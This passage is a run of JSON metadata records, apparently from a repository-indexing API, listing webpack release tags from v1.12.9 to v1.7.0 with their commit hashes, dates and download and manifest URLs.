ebpack%2Fwebpack/tags/v1.12.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9/manifests"},{"name":"v1.12.8","sha":"b59528164913d1234e9dccc55bdfbba2e75767d2","kind":"tag","published_at":"2015-11-20T20:32:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8/manifests"},{"name":"v1.12.7","sha":"a6c4414a7f38d8098f128bc50e8c83ed4a9de607","kind":"tag","published_at":"2015-11-20T19:32:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7/manifests"},{"name":"v1.12.6","sha":"7c3e68e8df03cdcef7a6102f61ed4b8cc91cda78","kind":"tag","published_at":"2015-11-14T08:29:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6/manifests"},{"name":"v1.12.5","sha":"3266bbcd16f8a80c35fcd518bf2fb2fe8997692c","kind":"tag","published_at":"2015-11-13T21:25:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5/manifests"},{"name":"v1.12.4","sha":"530f669e13770ccf5082f29dbde1b114e6173a07","kind":"tag","published_at":"2015-11-10T20:29:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4/manifests"},{"name":"v1.12.3","sha":"f3d65ef1b5a6ebba85083536e3a705fe96d31220","kind":"tag","published_at":"2015-11-06T00:10:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3/manifests"},{"name":"v2.0.0-beta","sha":"b2ba75b4c4360b0f14cb23fdb66355457de6f810","kind":"commit","published_at":"2015-11-01T22:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.0-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.0-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.0-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta/manifests"},{"name":"v1.12.2","sha":"89fda6a575eb379d974a30a5229d74c77ba35cc5","kind":"tag","published_at":"2015-09-16T21:13:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"cfcac5e3b62a52012318204dc798d7394e9ac6a9","kind":"tag","published_at":"2015-09-03T12:26:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"f155f32271ff81fee546c86b5685803377cebc09","kind":"tag","published_at":"2015-08-25T08:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0/manifests"},{"name":"v1.11.0","sha":"5335781be8c06c2ff9443431a196f6a94ca80bb3","kind":"tag","published_at":"2015-08-06T11:30:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0/manifests"},{"name":"v1.10.5","sha":"c4d78f7ca6e4a20e5b68f2720970a08cadb013e4","kind":"tag","published_at":"2015-07-23T22:04:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5/manifests"},{"name":"v1.10.4","sha":"107aa63c452d46c0628c53b856bd95e7e3d1b4ed","kind":"tag","published_at":"2015-07-23T21:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4/manifests"},{"name":"v1.10.3","sha":"b99eb70ce63ad33e23e9eef5ee6b4511846acba2","kind":"tag","published_at":"2015-07-22T21:53:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"c2a8b8a843609cbeeeafe92f81894dbe306d38a0","kind":"tag","published_at":"2015-07-22T20:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"f711f66f4cec8c72ba6a831eba8e662149508951","kind":"tag","published_at":"2015-07-02T13:25:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"df4e2e4e3df27d682feb962b896595d7eab27c2a","kind":"tag","published_at":"2015-06-27T20:50:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0/manifests"},{"name":"v1.9.13","sha":"e925c52a0e9fa55b06ffcc3b575e7f1621714056","kind":"tag","published_at":"2015-06-27T09:38:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13/manifests"},{"name":"v1.9.12","sha":"ba03fda4b5d2a515ccd87d26f3edd0dd357c4fde","kind":"tag","published_at":"2015-06-24T21:24:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12/manifests"},{"name":"v1.9.11","sha":"4c0f4afe8710376726a85c756729dc5e0b86fb95","kind":"tag","published_at":"2015-06-14T10:05:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11/manifests"},{"name":"v1.9.10","sha":"4de7bed0f946e42e6dde546ba35233e4eeb87c9d","kind":"tag","published_at":"2015-05-25T19:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10/manifests"},{"name":"v1.9.9","sha":"407d1bc76b41717a47f87211ffd6cbdfff6c7b1e","kind":"tag","published_at":"2015-05-24T07:35:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9/manifests"},{"name":"v1.9.8","sha":"69df24cc562c10caf5c02f36459ecacb7cd1823d","kind":"tag","published_at":"2015-05-21T22:16:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8/manifests"},{"name":"v1.9.7","sha":"0990aaa4754969e34184657577389b88fd845e87","kind":"tag","published_at":"2015-05-17T17:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7/manifests"},{"name":"v1.9.6","sha":"c5eceb0b2cf31fca84e724d3893d44c7042b9038","kind":"tag","published_at":"2015-05-15T15:24:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6/manifests"},{"name":"v1.9.5","sha":"e37a50683f74d6996373186db757289256a41bf7","kind":"tag","published_at":"2015-05-12T19:21:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5/manifests"},{"name":"v1.9.4","sha":"ac84ef731540635f615438cc8f4424ff63003ce1","kind":"tag","published_at":"2015-05-10T16:45:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4/manifests"},{"name":"v1.9.3","sha":"c7ac77fc907950dcf0dc355fae86164f688f9857","kind":"tag","published_at":"2015-05-10T14:44:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3/manifests"},{"name":"v1.9.2","sha":"0576143e96be118e4621f79db4b8d03b6d2c808e","kind":"tag","published_at":"2015-05-10T12:37:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"98663e71dbacfb82e02379671a821a373150dc7c","kind":"tag","published_at":"2015-05-10T11:53:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"0e21e6ec0b2e4ebc085c9e6ccf823480384e3943","kind":"tag","published_at":"2015-05-10T10:23:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0/manifests"},{"name":"v1.8.11","sha":"f7d7d30ee647dd8fc77972752d5b9fc47bbe09ea","kind":"tag","published_at":"2015-04-29T10:49:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11/manifests"},{"name":"v1.8.10","sha":"8e490bdee33dd4edea82c6d13ba80c6fe3246218","kind":"tag","published_at":"2015-04-26T20:50:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10/manifests"},{"name":"v1.8.9","sha":"e4453c78edb4613804c0c0a0e9f447d2def533c3","kind":"tag","published_at":"2015-04-21T21:34:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9/manifests"},{"name":"v1.8.8","sha":"924e02c98aba21b65d913a1f0e16d8818f018c3b","kind":"tag","published_at":"2015-04-21T06:38:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8/manifests"},{"name":"v1.8.7","sha":"0bc887a06c7f34a95e2756097f193f15ec1a443d","kind":"tag","published_at":"2015-04-20T18:51:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7/manifests"},{"name":"v1.8.6","sha":"a27641f8cc68ec557d9ca524afbbfb3b34ec2408","kind":"tag","published_at":"2015-04-20T17:46:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6/manifests"},{"name":"v1.8.5","sha":"53a534663446bfaa8fc4b3c202542d6a8a2aaadc","kind":"tag","published_at":"2015-04-17T08:26:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5/manifests"},{"name":"v1.8.4","sha":"bffe6037e99c7a741d64414368295b026d81c81a","kind":"tag","published_at":"2015-04-10T08:23:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4/manifests"},{"name":"v1.8.3","sha":"13c3a3c3445ac9b76f3fe2602963e8748673b458","kind":"tag","published_at":"2015-04-09T22:19:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3/manifests"},{"name":"v1.7.4","sha":"43a12294470d9e0337a325095e0fd4a3669ed6c6","kind":"tag","published_at":"2015-04-09T22:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4/manifests"},{"name":"v1.8.2","sha":"4c2b7a9ea5b45481ad408c8275ef58e6140a038f","kind":"tag","published_at":"2015-04-08T13:12:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"af22dce84cb13facf372f179a6a174cafa0397dd","kind":"tag","published_at":"2015-04-08T06:11:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"1f74f58273ae008e315275c6caa31ae3fad42551","kind":"tag","published_at":"2015-04-07T12:34:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0/manifests"},{"name":"v1.7.3","sha":"b1da5ed5c69f02cb9a4215a56157267b1de9a11b","kind":"commit","published_at":"2015-03-11T22:50:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"17d9dc161c7c8f969d83cb8503fead40db9798d9","kind":"commit","published_at":"2015-03-04T06:45:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"d09c8e713823c705cefea77bc34db6ab0e1cc0c3","kind":"commit","published_at":"2015-03-03T22:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1/manifests"},{"name":"v1.7.0","sha":"e5b5fa6d